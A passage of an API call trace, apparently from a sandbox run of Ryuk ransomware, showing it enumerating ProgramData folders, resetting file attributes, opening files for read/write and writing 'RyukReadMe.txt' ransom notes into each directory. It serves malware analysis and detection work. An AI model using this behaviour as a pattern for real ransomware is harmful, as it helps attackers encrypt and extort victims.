[0140.690] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.690] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.690] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.690] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.690] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.691] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat", dwFileAttributes=0x80) returned 0 [0140.691] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.691] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.691] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.691] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.691] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.691] SetLastError (dwErrCode=0x0) [0140.691] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.691] GetLastError () returned 0x5 [0140.691] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.691] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.691] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.691] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.692] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat", dwFileAttributes=0x80) returned 0 [0140.692] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.692] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.692] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.692] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.692] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.692] SetLastError (dwErrCode=0x0) [0140.692] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.692] GetLastError () returned 0x5 [0140.692] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.692] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.692] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.692] SetLastError (dwErrCode=0x0) [0140.692] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.692] GetLastError () returned 0x5 [0140.692] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.692] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.692] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.693] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.693] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.693] SetLastError (dwErrCode=0x0) [0140.693] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\rac\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.693] GetLastError () returned 0x5 [0140.693] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.693] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.693] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.693] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.693] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.693] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.693] SetLastError (dwErrCode=0x0) [0140.693] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\Outbound\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\rac\\outbound\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.693] GetLastError () returned 0x5 [0140.693] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.693] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.693] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.693] SetLastError (dwErrCode=0x0) [0140.693] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\rac\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.694] GetLastError () returned 0x5 [0140.694] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.694] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.694] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.694] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.694] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.694] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.694] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf", dwFileAttributes=0x80) returned 1 [0140.694] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.694] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.694] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.695] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.695] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.695] SetLastError (dwErrCode=0x0) [0140.695] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0140.695] GetLastError () returned 0x0 [0140.695] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0140.696] CloseHandle (hObject=0x188) returned 1 [0140.696] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.696] SetLastError (dwErrCode=0x0) [0140.696] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\rac\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.696] GetLastError () returned 0x5 [0140.696] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.696] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.696] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.696] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.696] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.696] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.696] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", dwFileAttributes=0x80) returned 0 [0140.696] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.697] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.697] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.697] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.697] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.697] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat", dwFileAttributes=0x80) returned 0 [0140.697] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.697] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.697] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.697] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.697] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.697] SetLastError (dwErrCode=0x0) [0140.697] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\StateData\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.698] GetLastError () returned 0x5 [0140.698] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.698] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.698] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.698] SetLastError (dwErrCode=0x0) [0140.698] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\rac\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.698] GetLastError () returned 0x5 [0140.698] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.698] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.698] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\RAC\\Temp\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.698] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.698] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.698] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.698] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql4826.tmp", dwFileAttributes=0x80) returned 0 [0140.698] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql4826.tmp" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\sql4826.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.698] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.698] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.699] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.699] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.699] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql4846.tmp", dwFileAttributes=0x80) returned 1 [0140.699] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql4846.tmp" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\sql4846.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.699] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.699] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.699] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.699] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.699] SetLastError (dwErrCode=0x0) [0140.699] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\Temp\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0140.699] GetLastError () returned 0x0 [0140.700] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0140.700] CloseHandle (hObject=0x188) returned 1 [0140.700] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.700] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.700] SetLastError (dwErrCode=0x0) [0140.700] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RAC\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\rac\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.701] GetLastError () returned 0x5 [0140.701] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.701] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.701] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.701] SetLastError (dwErrCode=0x0) [0140.701] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.701] GetLastError () returned 0x5 [0140.701] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.701] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.701] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Search\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.702] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.702] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.702] SetLastError (dwErrCode=0x0) [0140.702] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Search\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\search\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.702] GetLastError () returned 0x5 [0140.702] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.702] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.702] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Search\\Data\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0xffffffffffffffff [0140.702] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0140.702] SetLastError (dwErrCode=0x0) [0140.702] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Search\\Data\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\search\\data\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.702] GetLastError () returned 0x5 [0140.702] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.702] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.702] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.702] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.717] SetLastError (dwErrCode=0x0) [0140.717] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Search\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\search\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.717] GetLastError () returned 0x5 [0140.717] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.717] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.717] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.717] SetLastError (dwErrCode=0x0) [0140.717] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.718] GetLastError () returned 0x5 [0140.718] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.718] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.718] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.718] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.718] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.718] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.718] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat", dwFileAttributes=0x80) returned 1 [0140.719] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" (normalized: "c:\\programdata\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0140.719] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=0) returned 1 [0140.719] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=0) returned 1 [0140.719] CloseHandle (hObject=0x188) returned 1 [0140.719] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.719] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.719] SetLastError (dwErrCode=0x0) [0140.719] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\user account pictures\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0140.720] GetLastError () returned 0x0 [0140.720] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0140.720] CloseHandle (hObject=0x188) returned 1 [0140.721] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.722] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.722] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.722] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.722] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp", dwFileAttributes=0x80) returned 0 [0140.723] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: 